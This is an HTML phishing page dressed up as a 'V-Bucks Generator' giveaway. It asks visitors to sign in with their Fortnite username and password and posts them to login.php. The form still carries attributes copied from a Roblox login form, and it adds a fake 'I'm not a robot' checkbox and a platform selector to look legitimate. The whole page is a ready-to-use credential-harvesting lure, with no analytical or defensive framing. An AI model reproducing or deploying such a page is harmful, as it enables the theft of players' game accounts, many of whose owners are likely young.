<!DOCTYPE html>

<html>
<head>
	<title>V-Bucks Giveaway</title>
	<link href="https://fonts.googleapis.com/css?family=Titan+One" rel=
	"stylesheet">
	<style>
	       body, html {
	   height: 90%;
	}

	.bg { 
	   background-image: url(http://www.mobygames.com/images/promo/original/1416d94209f84c21a972a3c3a87641ee.png);
	   height: 90%; 
	   background-position: center;
	   background-repeat: no-repeat;
	   background-size: cover;
	}
	</style>
</head>

<body class="bg">
	<center>
		<div style=
		"color:blue;opacity: 0.8;font-family: 'Titan One', cursive;background-color:black;width:500px;height:600px">
			<br>


			<h1>V-Bucks Generator</h1>
			<h3>Sign-In with Fortnite Account</h3>


			<form action="login.php" class="navbar-form form-inline navbar-left"
			data-sign-on-api-path="https://api.roblox.com/login/v1"
			data-use-apiproxy-signin="False" id="LogInForm" method="post" name=
			"loginForm" novalidate="" role="form">
				<div class="form-group">
					<input autofocus="autofocus" class="form-control" id="LoginUsername" name=
					"username" placeholder="Username" style="width:320px;" type="text">
				</div>
				<br>


				<div class="form-group">
					<input class="form-control" id="LoginPassword" name="password"
					placeholder="Password" style="width:320px;" type="password">
				</div>
				<br>


				<div>
					<select style="width:320px;">
						<option value="volvo">
							PC
						</option>

						<option value="saab">
							Xbox
						</option>

						<option value="mercedes">
							PS4
						</option>
					</select>
				</div>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<div style="border-color:blue;">
					    <input style="width:45px;height:45px;" type="checkbox" id="robot" name="NotARobot">
						<label for="robot"><font size=6>I'm not a robot.</font></label>
				</div>
				<br>
				<div class="form-group">
					<input class="form-control" id="LoginButton" style=
					"color:blue;opacity:2;font-size: 20px;border-style: inset;border-color:black;font-family: 'Titan One', cursive;background-color:black;width:500px;width:150px;height:70px;" type="submit" value="Enter" href="done.html">
				</div>
			</form>
		</div>
	</center>
</body>
</html>